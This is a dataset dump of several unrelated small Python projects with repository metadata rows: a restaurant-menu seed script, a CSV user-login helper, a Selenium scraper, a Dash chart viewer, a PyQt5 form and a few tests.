"Lobster, shrimp, sea snails, crawfish, stacked into a delicious tower", \
price="$13.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken and Rice", description=\
"Chicken... and rice", price="$4.95", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Mom's Spaghetti", description=\
"Spaghetti with some incredible tomato sauce made by mom", price="$6.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Choc Full O\' Mint (Smitten\'s \
Fresh Mint Chip ice cream)",
description="Milk, cream, salt, ..., Liquid nitrogen magic. \
Signed waver required.", price="$3.95", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Tonkatsu Ramen", description=\
"Noodles in a delicious pork-based broth with a soft-boiled egg", \
price="$7.95", course="Entree",restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Noodle Bowl", description="Noodles in \
a delicious pork juice", price="$3.95", course="Appetizer",\
restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Carmel Cake", description=\
"Hot fresh cake with warm carmel", price="$4.95", course="Dessert",\
restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Coke Fountain", description=\
"All famous Coke products", price="$2.95", course="Beverage",\
restaurant=restaurant1)
session.add(menuItem8)
session.commit()
menuItem9 = MenuItem(user_id=1, name="Wine List", description="We have red \
and white wine", price="$4.95", course="Beverage",restaurant=restaurant1)
session.add(menuItem9)
session.commit()
# Menu for Andala's
restaurant1 = Restaurant(user_id=1, name="Andala's", address="10477 Lombardy \
Ln, Dallas, TX 75220-4349", phone="989-234-6070", cuisine_cat="Italian", \
health_rating= "Good", picture= '/static/andala.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Lamb Curry", description="Slow cook \
that thang in a pool of tomatoes, onions and alllll those tasty Indian \
spices. Mmmm.",price="$9.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken Marsala", description="Chicken \
cooked in Marsala wine sauce with mushrooms", price="$7.95", course="Entree",\
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Potstickers", description="Delicious \
chicken and veggies encapsulated in fried dough.", price="$6.50", course=\
"Appetizer", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Nigiri Sampler", description="Maguro, \
Sake, Hamachi, Unagi, Uni, TORO!", price="$6.75", course="Appetizer", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$7.00", \
course="Entree", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Cake of the Day", description=\
"Daily pick of Chocolate, Carmel, Strawberry or Vanilla homemade \
cake", price="$3.50", course="Dessert", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Soft Drink Bar", description=\
"Pick from large selection of soft drinks.", price="$2.75", course=\
"Beverage", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Desert Bar", description="Pick from \
large selection of cakes, cookies, and ice cream.", price="$4.75", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Auntie Ann's
restaurant1 = Restaurant(user_id=1, name="Auntie Ann\'s Diner' ", address=\
"8300 Preston Road, Dallas, TX 75225", phone="989-504-6045", cuisine_cat=\
"American", health_rating= "Fair", picture = '/static/auntannies.jpg')
session.add(restaurant1)
session.commit()
menuItem9 = MenuItem(user_id=1, name="Chicken Fried Steak",
description="Fresh battered sirloin steak fried and smothered with \
cream gravy", price="$8.99", course="Entree", restaurant=restaurant1)
session.add(menuItem9)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Boysenberry Sorbet", description="An \
unsettlingly huge amount of ripe berries turned into frozen (and seedless) \
awesomeness", price="$2.99", course="Dessert", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Broiled salmon", description="Salmon \
fillet marinated with fresh herbs and broiled hot & fast", price="$10.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Morels on toast (seasonal)", \
description="Wild morel mushrooms fried in butter, served on herbed \
toast slices", price="$7.50", course="Appetizer", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Tandoori Chicken", description="Chicken \
marinated in yoghurt and seasoned with a spicy mix(chilli, tamarind among \
others) and slow cooked in a cylindrical clay or metal oven which gets \
its heat from burning charcoal.", price="$8.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$9.50", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem10 = MenuItem(user_id=1, name="Spinach Ice Cream", description=\
"vanilla ice cream made with organic spinach leaves", price="$1.99", \
course="Dessert", restaurant=restaurant1)
session.add(menuItem10)
session.commit()
menuItem11 = MenuItem(user_id=1, name="Soft Drink Bar", description=\
"Variety of cold soft drinks", price="$1.99", course="Beverage", \
restaurant=restaurant1)
session.add(menuItem11)
session.commit()
# Menu for Cocina Y Amor
restaurant1 = Restaurant(user_id=1, name="Cocina Y Amor ", address=\
"2401 McKinney Ave, Dallas, TX 75201", phone="981-232-6570", cuisine_cat=\
"Mexican", health_rating= "Poor", picture= '/static/Mexican.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Super Burrito Al Pastor",
description="Marinated Pork, Rice, Beans, Avocado,Cilantro, Salsa, \
Tortilla", price="$5.95", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Cachapa", description="Golden brown, \
corn-based Venezuelan pancake; usually stuffed with queso telita or queso \
de mano, and possibly lechon. ", price="$7.99", course="Entree", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Taco Max", description="Big soft taco \
shell covered with Beef, cheese, and sides. ", price="$7.99", course=\
"Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Chips and Salsa", description="Chips \
and local made salsa. ", price="$3.99", course="Appetizer", restaurant=\
restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Fried Ice Cream", description="Balls of \
Ice Cream battered and fried. ", price="$3.99", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Soft Drink Bar", description="Variety of \
soft drinks ", price="$2.75", course="Beverage", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
restaurant1 = Restaurant(user_id=1, name="Stratos", address="2907 W Northwest \
Hwy, Dallas, TX", phone="857-234-1270", cuisine_cat="Greek", health_rating= \
"Good", picture = '/static/stratos.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Nick's Gyros", description="classic gyro \
freshly sliced off the rotisserie stuffed in a grilled Pita with homemade \
Tzatziki sauce, tomatoes and red onions, served with fries", price="$10.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit
menuItem2 = MenuItem(user_id=1, name="Meat lovers Gyro Plate",
description="Double gyro meat atop a toasted Pita open-face with \
tomatoes, red onions, homemade Tzatziki sauce, sided with Feta cheese \
and Kalamata olives.", price="$13.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Rack of Lamb",
description="Tender Australian lamb chops with oregano and grilled to \
savory perfection, seved with rice, fresh sauteed garden vegetables \
with pitta bread.", price="$13.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Stratos",
description="beer battered and deep fried, sided with marinara and \
ranch", price="$6.25", course="Appetizer", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Spanakopita",
description="Spinach, Feta cheese and onions baked in layers of flaky \
phyllo", price="$6.50", course="Appetizer", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Aphrodite's Chocolate Passion", \
description="a sex bomb of a dessert -Dallas Morning News. A brownie crust \
filled with chocolate mousse cake with chunks of New York cheesecake and \
caramel erupting from the center crowned with almond slivers and chocolate \
curls, sided with a scoop of vanilla ice cream", price="$8.50", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Fried Cheesecake",
description="New York cheesecake wrapped in flaky phyllo dough sheets \
and deep fried, rolled in sugar and cinnamo", price="$7.50", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Red & White Wine List",
description="Large selection of wines for your drinking pleasure", \
price="$7.50", course="Beverage", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
print "added menu items!"
| [
"tomakeitcount@gmail.com"
] | tomakeitcount@gmail.com |
b374fb8dd5c5ce3c6e5a407d2029560a72675aae | 8d5a9930ccca4631a6d049449fc6c6edc8847a9a | /FlaskWebProject1/FlaskWebProject1/Models/LocalDatabaseRoutines.py | fde153d77616b16c3d460a37a542bf536ebb230b | [] | no_license | JonathanLevy10/FlaskWebProject1 | ee43ee2bb78ffa32a30a650402e73c0e1f6cd6ef | f783c12afa57b1e65b80351246cf40ecb29cf92c | refs/heads/master | 2022-07-25T03:11:57.623536 | 2020-05-14T18:16:48 | 2020-05-14T18:16:48 | 259,357,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | from os import path
import json
import pandas as pd
def create_LocalDatabaseServiceRoutines():
    """Factory: return a fresh LocalDatabaseServiceRoutines instance."""
    return LocalDatabaseServiceRoutines()
class LocalDatabaseServiceRoutines(object):
    """CSV-backed user 'database': read, write, lookup and registration.

    NOTE(review): passwords are stored in plain text in the CSV — hashing
    them is strongly recommended, but out of scope for this change.
    """

    def __init__(self):
        self.name = 'Database cron jobs'
        self.index = {}
        print(path.dirname(__file__))
        # Path to the users CSV, relative to this module.
        # NOTE(review): the backslash separators make this Windows-specific
        # — confirm the deployment target.
        self.UsersDataFile = path.join(path.dirname(__file__), '..\\static\\Data\\users.csv')

    # -------------------------------------------------------
    # Read users data into a dataframe
    # -------------------------------------------------------
    def ReadCSVUsersDB(self):
        """Load the whole users CSV into a pandas DataFrame."""
        return pd.read_csv(self.UsersDataFile)

    # -------------------------------------------------------
    # Saves the DataFrame (input parameter) into the users csv
    # -------------------------------------------------------
    def WriteCSVToFile_users(self, df):
        """Overwrite the users CSV with *df* (no index column)."""
        df.to_csv(self.UsersDataFile, index=False)

    # -------------------------------------------------------
    # Check if username is in the data file
    # -------------------------------------------------------
    def IsUserExist(self, UserName):
        """Return True if *UserName* appears in the username column."""
        df = self.ReadCSVUsersDB()
        return bool((df['username'] == UserName).any())

    # -------------------------------------------------------
    # return boolean if username/password pair is in the DB
    # -------------------------------------------------------
    def IsLoginGood(self, UserName, Password):
        """Return True if some row matches both username and password.

        Rewritten as a single boolean mask: the previous implementation
        built a throwaway DataFrame and used DataFrame.any(1), whose
        positional-axis form is removed in modern pandas.
        """
        df = self.ReadCSVUsersDB()
        match = (df['username'] == UserName) & (df['password'] == Password)
        return bool(match.any())

    # -------------------------------------------------------
    # Add a new user to the DB
    # -------------------------------------------------------
    def AddNewUser(self, User):
        """Append one user (a registration form object) and persist the CSV.

        Uses pd.concat because DataFrame.append was removed in pandas 2.0.
        """
        df = self.ReadCSVUsersDB()
        dfNew = pd.DataFrame(
            [[User.firstname.data, User.lastname.data, User.phonenumber.data,
              User.emailaddress.data, User.username.data, User.password.data]],
            columns=['firstname', 'lastname', 'phonenumber',
                     'emailaddress', 'username', 'password'])
        dfComplete = pd.concat([df, dfNew], ignore_index=True)
        self.WriteCSVToFile_users(dfComplete)
| [
"jonathanlevy100@gmail.com"
] | jonathanlevy100@gmail.com |
97d8869524ef83d60dca7a4088e49759caefe61f | 0c072d8e09b6affefacd7f551539161836be68a0 | /app.py | b8c64f6cead3cee4d38a88043ecfe626c40a724c | [] | no_license | AlexandrDemin/python-selenium-parser | a21a1b09483d6de4f053ea5c35794f82d4cc7328 | 08d3abe8f1258c162c990d0241280cd9f5ae01f8 | refs/heads/master | 2020-07-26T08:16:40.015962 | 2019-09-15T12:07:04 | 2019-09-15T12:07:04 | 208,587,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,712 | py | from logic import *
# Trim old log entries so the log store does not grow without bound
discardOldLogs(10000)
# Read parser and subscription configuration files
parsers_config, subscriptions_config = readConfigs('./parsers-config.json', './subscriptions-config.json')
# Log the start of the run ("Старт" = "Start")
writeLog({
    'time': datetime.now().strftime(getDateFormat(True)),
    'message': "Старт"
})
# Launch Chrome via Selenium WebDriver
driver = webdriver.Chrome()
# Iterate over subscriptions, scrape each site and send out the e-mails
for user in subscriptions_config:
    for subscription in user['subscriptions']:
        try:
            website = subscription['website']
            parser_config = parsers_config[website]
            fltr = subscription['filter']
            data = parseSite(website, parser_config, fltr, driver, subscription)
            # Log how many items were parsed for this subscription
            writeLog({
                'time': datetime.now().strftime(getDateFormat(True)),
                'message': f"Спарсили {len(data)} элементов по подписке {subscription['name']}"
            })
            if len(data):
                # Only e-mail when the scrape produced at least one item
                html_content = generateHtml(data, subscription, parser_config.get("values").get("TYPES"), user['guid'])
                sendEmail(user['email'], subscription['name'], html_content)
        except Exception as e:
            # Best-effort per subscription: log the failure and continue
            writeLog({
                'time': datetime.now().strftime(getDateFormat(True)),
                'error': f'Ошибка при обработке подписки {subscription["name"]}',
                'stackTrace': str(e)
            }, True)
# Shut Chrome down
driver.quit()
writeLog({
    'time': datetime.now().strftime(getDateFormat(True)),
    'message': f"Финиш"
})
| [
"hseoanalytics@gmail.com"
] | hseoanalytics@gmail.com |
2e649e38f08b2d73a928df18881ff569ea42cb6e | 59061e3699f3a181cba344360ed3cf89db88763b | /sandbox/uTools/dash/data_viewer.py | ad7aa813976ea8ddf3299c490a8cf27d30d50f83 | [
"MIT"
] | permissive | giecli/unifloc | 4a4bb8cd0b37d5905eab5a367e6b5ccb324d4df8 | f1b97e144a0292d43e341cd3b3552ee8fd8713eb | refs/heads/master | 2022-06-27T10:40:47.821344 | 2020-05-11T16:47:20 | 2020-05-11T16:47:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,314 | py | """
Веб-просмотрщик графиков. Открывается в браузере. Для построения графиков датафреймов по временному индексу.
Считывает все файлы .csv которые лежат в dir_path и строит графики всех колонок от временного индекса.
Можно добавить до 6 графиков.
К каждому графику идут 2 элемента управления:
- 1-ый отвечает за выбор файлов для графика
- 2-ый отвечает за выбор колонок. Список колонок уникальный из всех файлов.
Поэтому если для конкретного файла выбранной колонки нет, то график не построится.
Код универсален и может быть использован для любого проекта,
нужно только поменять директорию для считывания файлов - переменная dir_path
10/01/2020
А.Водопьян
O.Koбзарь
"""
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import plotly.graph_objs as go
from plotly.subplots import make_subplots
import pandas as pd
from glob import glob
# Служебные переменные, можно менять настройки перед запуском
ver = '0.2.1'
date = '01/2020'
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
graph_mode = 'lines+markers' # 'markers', 'lines', 'lines+markers'
dir_path = 'input/'
# Считывание файлов
file_paths = glob(dir_path + '*.csv')
file_names = [file_path[len(dir_path):] for file_path in file_paths]
files = {}
for file_name, file_path in zip(file_names, file_paths):
files.update({file_name: pd.read_csv(file_path, index_col=0)})
all_cols = list(files[file_names[0]].columns)
for i in range(1, len(file_names)):
all_cols += list(files[file_names[i]].columns)
unique_cols = list(set(all_cols))
# Функции для построения графиков
def make_sub(dfs, df_keys, params):
    """Collect one Scattergl trace per (dataframe, column) pair.

    Columns missing from a dataframe, or empty after dropping NaNs,
    are silently skipped.
    """
    traces = []
    for label, frame in zip(df_keys, dfs):
        for column in params:
            if column not in frame.columns:
                continue
            cleaned = frame.dropna(subset=[column])
            if cleaned.empty:
                continue
            traces.append(go.Scattergl(
                x=cleaned.index, y=cleaned[column],
                name=label + ', ' + column,
                mode=graph_mode, marker=dict(size=5)))
    return traces
def plot_ex(list_dfs, list_df_keys, list_params, height):
    """Assemble a vertically stacked figure with one subplot per entry."""
    fig = make_subplots(rows=len(list_dfs), shared_xaxes=True, vertical_spacing=0.02)
    rows = zip(list_dfs, list_df_keys, list_params)
    for row_no, (dfs, keys, params) in enumerate(rows, start=1):
        for trace in make_sub(dfs, keys, params):
            fig.append_trace(trace, row=row_no, col=1)
    fig.update_layout(height=height)
    return fig
# Application code: Dash app with a header row, per-subplot controls and
# the figure. The six copy-pasted control blocks are generated by one
# helper instead of being repeated inline.
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)


def _management_controls(idx, hidden=False):
    """Build the control row (file picker + column picker) for subplot *idx*.

    Rows for graphs 3-6 start hidden and are revealed by the
    'add graph' button callbacks.
    """
    children = [
        html.P('Управление графиком %d' % idx, id='text-%d' % idx),
        dcc.Dropdown(
            id='loaded_files_dict-subplot-%d' % idx,
            options=[{'label': i, 'value': i} for i in file_names],
            value=[file_names[0]],
            multi=True),
        dcc.Dropdown(
            id='cols-subplot-%d' % idx,
            options=[{'label': i, 'value': i} for i in unique_cols],
            value=[unique_cols[0]],
            multi=True)]
    if hidden:
        return html.Div(children, id='management-%d' % idx, style={'display': 'none'})
    return html.Div(children, id='management-%d' % idx)


app.layout = html.Div(children=[
    html.Div([html.H4('Просмотрщик графиков'),
              html.P('Версия %s. %s' % (ver, date)),
              html.P('Водопьян А.О., Кобзарь О.С.')],
             style={'width': '20%', 'display': 'inline-block'}),
    html.Div([html.H4('Создайте от 2 до 6 графиков'),
              html.P('Выберите файл/файлы для каждого графика'),
              html.P('Выберите параметр/параметры для каждого графика')],
             style={'width': '20%', 'display': 'inline-block'}),
    html.Div([html.Button(id='add-graph-button', n_clicks=0, children='Добавить график')],
             style={'display': 'inline-block'}),
    # Control rows for graphs 1-6; 3-6 are hidden until added.
    _management_controls(1),
    _management_controls(2),
    _management_controls(3, hidden=True),
    _management_controls(4, hidden=True),
    _management_controls(5, hidden=True),
    _management_controls(6, hidden=True),
    html.Div([
        dcc.Graph(
            id='plot',
            figure=plot_ex([[files[file_names[0]]], [files[file_names[0]]]],
                           [[file_names[0]], [file_names[0]]],
                           [[files[file_names[0]].columns[0]],
                            [files[file_names[0]].columns[0]]], 600)
        )])
], id='main')
@app.callback(Output('plot', 'figure'),
              [Input('loaded_files_dict-subplot-1', 'value'),
               Input('cols-subplot-1', 'value'),
               Input('loaded_files_dict-subplot-2', 'value'),
               Input('cols-subplot-2', 'value'),
               Input('loaded_files_dict-subplot-3', 'value'),
               Input('cols-subplot-3', 'value'),
               Input('loaded_files_dict-subplot-4', 'value'),
               Input('cols-subplot-4', 'value'),
               Input('loaded_files_dict-subplot-5', 'value'),
               Input('cols-subplot-5', 'value'),
               Input('loaded_files_dict-subplot-6', 'value'),
               Input('cols-subplot-6', 'value')],
              [State('add-graph-button', 'n_clicks')])
def update_graph(file_vals1, col_vals1, file_vals2, col_vals2, file_vals3, col_vals3, file_vals4, col_vals4,
                 file_vals5, col_vals5, file_vals6, col_vals6, n_clicks):
    """Rebuild the stacked figure from the current file/column selections.

    Two subplots are always shown; each press of the 'add graph' button
    reveals one more (up to 6), each adding 200px of height.
    """
    selections = [(file_vals1, col_vals1), (file_vals2, col_vals2),
                  (file_vals3, col_vals3), (file_vals4, col_vals4),
                  (file_vals5, col_vals5), (file_vals6, col_vals6)]
    visible = 2 + min(n_clicks, 4)
    shown = selections[:visible]
    files_plot = [[files[name] for name in file_sel] for file_sel, _ in shown]
    files_vals = [file_sel for file_sel, _ in shown]
    col_vals = [col_sel for _, col_sel in shown]
    height = 600 + 200 * (visible - 2)
    return plot_ex(files_plot, files_vals, col_vals, height)
@app.callback(Output('management-3', 'style'),
              [Input('add-graph-button', 'n_clicks')])
def update_management_3(n_clicks):
    """Reveal the controls for graph 3 on the first button press."""
    if not 0 < n_clicks < 2:
        raise PreventUpdate
    return {'display': 'inline'}
@app.callback(Output('management-4', 'style'),
              [Input('add-graph-button', 'n_clicks')])
def update_management_4(n_clicks):
    """Reveal the controls for graph 4 on the second button press."""
    if not 1 < n_clicks < 3:
        raise PreventUpdate
    return {'display': 'inline'}
@app.callback(Output('management-5', 'style'),
              [Input('add-graph-button', 'n_clicks')])
def update_management_5(n_clicks):
    """Reveal the controls for graph 5 on the third button press."""
    if not 2 < n_clicks < 4:
        raise PreventUpdate
    return {'display': 'inline'}
@app.callback(Output('management-6', 'style'),
              [Input('add-graph-button', 'n_clicks')])
def update_management_6(n_clicks):
    """Reveal the controls for graph 6 on the fourth button press."""
    if not 3 < n_clicks < 5:
        raise PreventUpdate
    return {'display': 'inline'}
if __name__ == '__main__':
    # Start the Dash development server (blocks until interrupted).
    app.run_server()
| [
"oleg.kobzarius@gmail.com"
] | oleg.kobzarius@gmail.com |
5764a65bdcda6024e0ed844fb8b8f999255b8dc7 | b43103229a5fc3c49285818881eea7c42b8021c2 | /YouTube/untitled.py | 0f980ba263b37c670de858c3ac23326e6f6d2be4 | [] | no_license | AlienWu2019/Alien-s-Code | 34eaf60ae7ada4810c3564cee1a25371c1c3f7ad | 983f68d13a81e6141779d26c84e371b2bf1d2e0d | refs/heads/master | 2020-05-07T18:42:03.723993 | 2019-05-05T14:32:49 | 2019-05-05T14:32:49 | 180,777,724 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'untitled.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
    """pyuic5-generated layout for a video-URL input form.

    Do not hand-edit the widget setup: regenerating from untitled.ui
    will overwrite any changes (see the file header warning).
    """
    def setupUi(self, Form):
        # Create, position and wire all child widgets on *Form*.
        Form.setObjectName("Form")
        Form.resize(601, 124)
        self.label = QtWidgets.QLabel(Form)
        self.label.setGeometry(QtCore.QRect(30, 20, 91, 16))
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(Form)
        self.label_2.setGeometry(QtCore.QRect(30, 70, 72, 15))
        self.label_2.setObjectName("label_2")
        self.lineEdit = QtWidgets.QLineEdit(Form)
        self.lineEdit.setGeometry(QtCore.QRect(130, 10, 331, 31))
        self.lineEdit.setObjectName("lineEdit")
        self.textBrowser = QtWidgets.QTextBrowser(Form)
        self.textBrowser.setGeometry(QtCore.QRect(130, 60, 331, 31))
        self.textBrowser.setObjectName("textBrowser")
        self.pushButton = QtWidgets.QPushButton(Form)
        self.pushButton.setGeometry(QtCore.QRect(490, 10, 93, 28))
        self.pushButton.setObjectName("pushButton")
        self.pushButton_2 = QtWidgets.QPushButton(Form)
        self.pushButton_2.setGeometry(QtCore.QRect(490, 60, 93, 28))
        self.pushButton_2.setObjectName("pushButton_2")
        self.retranslateUi(Form)
        # Signal/slot wiring produced by Qt Designer.
        self.lineEdit.windowIconTextChanged['QString'].connect(self.pushButton.click)
        self.pushButton.clicked.connect(Form.show)
        self.pushButton_2.clicked.connect(self.lineEdit.show)
        self.pushButton_2.clicked.connect(self.textBrowser.show)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        # Install all user-visible (translated) strings.
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        self.label.setText(_translate("Form", "输入视频url:"))
        self.label_2.setText(_translate("Form", "状态:"))
        self.pushButton.setText(_translate("Form", "确定"))
        self.pushButton_2.setText(_translate("Form", "清空"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
widget = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(widget)
widget.show()
sys.exit(app.exec_()) | [
"q582946945@gmail.com"
] | q582946945@gmail.com |
bd68f8041117d92eb553df754224acbd6b160e37 | a4440a990b86a239a30b4295661ca588db3f5928 | /venv/bin/pip2.7 | b11f3cf45970c225a164150b0c3ba31a8c289eb2 | [] | no_license | YangXinNewlife/MachineLearning | fdaa1f75b90c143165d457b645d3c13fee7ea9a1 | 196ebdc881b74c746f63768b7ba31fec65e462d5 | refs/heads/master | 2020-04-05T00:10:25.050507 | 2019-06-10T03:44:33 | 2019-06-10T03:44:33 | 156,386,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | 7 | #!/Users/yangxin_ryan/PycharmProjects/MachineLearning/venv/bin/python
# -*- coding: utf-8 -*-
# Auto-generated pip console-script wrapper for this virtualenv.
import re
import sys
from pip._internal import main
if __name__ == '__main__':
    # Normalize argv[0]: strip a trailing "-script.py(w)" or ".exe"
    # before delegating to pip's internal entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"yangxin03@youxin.com"
] | yangxin03@youxin.com |
1e7d4503de1ff9096dd99d0ae21546a1e45e192d | ed6618caf0ab52e468a490b9541cd62d72baeef9 | /tests/ArgumentPassingTests.py | 76709382d6ea18bebdc3212ab0cce21bf60712ea | [
"Unlicense"
] | permissive | threadly/python-threadly | 3b51bc1a38a579f137c82cfad97c45c1dc5ca3a6 | b0620d474c5d349fa75f2915fbe3035a9523225b | refs/heads/master | 2021-01-17T17:22:59.069830 | 2019-08-20T19:49:57 | 2019-08-20T19:49:57 | 18,851,014 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | import threadly, time, random
import unittest
class TestAugumentParsing(unittest.TestCase):
  """Checks that threadly's execute()/schedule() forward args and kwargs.

  NOTE(review): relies on time.sleep(.1) for the scheduler to run the
  callback - timing-sensitive, may flake on a loaded machine.
  """
  def arguments(self, arg1, key=None):
    # Callback under test: records the positional and keyword values.
    self.assertNotEqual(arg1, None)
    self.assertNotEqual(key, None)
    self.arg1 = arg1
    self.keys = {"key":key}
  def test_keyTestExecute(self):
    # One-shot execution must pass args/kwargs through unchanged.
    self.arg1 = None
    self.keys = {}
    sch = threadly.Scheduler(10)
    sch.execute(self.arguments, args=("test", ), kwargs={"key":"test"})
    time.sleep(.1)
    self.assertEqual(self.arg1, "test")
    self.assertEqual(self.keys["key"], "test")
    sch.shutdown().get()
  def test_keyTestSchedule(self):
    # Recurring schedule must also pass args/kwargs through unchanged.
    self.arg1 = None
    self.keys = {}
    sch = threadly.Scheduler(10)
    sch.schedule(self.arguments, recurring=True, delay=10, args=("test", ), kwargs={"key":"test"}, key="TEST")
    time.sleep(.1)
    self.assertEqual(self.arg1, "test")
    self.assertEqual(self.keys["key"], "test")
    sch.shutdown().get()
if __name__ == '__main__':
  unittest.main()
| [
"lwahlmeier@gmail.com"
] | lwahlmeier@gmail.com |
8fb8a742cc9a4cd0b6f9757c2cf563844e3b7dba | 63082cd1d0b9bb7e5dc8aca40e447a207f91ff6a | /tests/test_login.py | d5893c578eaaf7abc0628261e8d792951939ca29 | [
"MIT"
] | permissive | MPEDS/mpeds-coder | ec8ab42d874b1104082b26ca4158c8304ed0b189 | 5fb22ef3fd9e45d5f17a20d436f4813b6c63dd0c | refs/heads/master | 2022-09-30T23:41:32.876632 | 2022-09-15T20:57:37 | 2022-09-15T20:57:37 | 51,221,179 | 19 | 3 | MIT | 2021-08-30T20:46:51 | 2016-02-06T20:47:04 | Python | UTF-8 | Python | false | false | 1,327 | py | import csv
import unittest
from selenium.webdriver import Firefox, FirefoxOptions
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
class LoginTest(unittest.TestCase):
    """Smoke-tests the adjudication login via headless Firefox.

    Fix: the original created a single class-level WebDriver at class
    definition time but quit it in tearDown(), so every test after the
    first ran against a dead browser session. A fresh driver is now
    created per test in setUp() and quit in tearDown().
    """

    def setUp(self):
        opts = FirefoxOptions()
        opts.add_argument("--headless")
        self.driver = Firefox(options=opts)

        # Load username -> password pairs from the credentials file.
        users = {}
        with open('credentials.csv', newline='') as csvfile:
            reader = csv.reader(csvfile, delimiter=',')
            for row in reader:
                users[row[0]] = row[1]

        print("Navigating to homepage...")
        self.driver.get("http://cliff.ssc.wisc.edu/campus_protest_dev/adj")

        print("Logging in...")
        self.driver.find_element(By.NAME, 'username').send_keys('adj1')
        self.driver.find_element(By.NAME, 'password').send_keys(users['adj1'])
        self.driver.find_element(By.NAME, 'login').send_keys(Keys.ENTER)

    def tearDown(self):
        self.driver.quit()

    ## Tests
    def test_login(self):
        # Wait up to 10s for the post-login landing link to appear.
        el = WebDriverWait(driver = self.driver, timeout = 10).\
            until(lambda d: d.find_element_by_link_text("Adjudication Interface"))
        self.assertEqual(el.text, "Adjudication Interface")
if __name__ == "__main__":
unittest.main() | [
"alex.hanna@gmail.com"
] | alex.hanna@gmail.com |
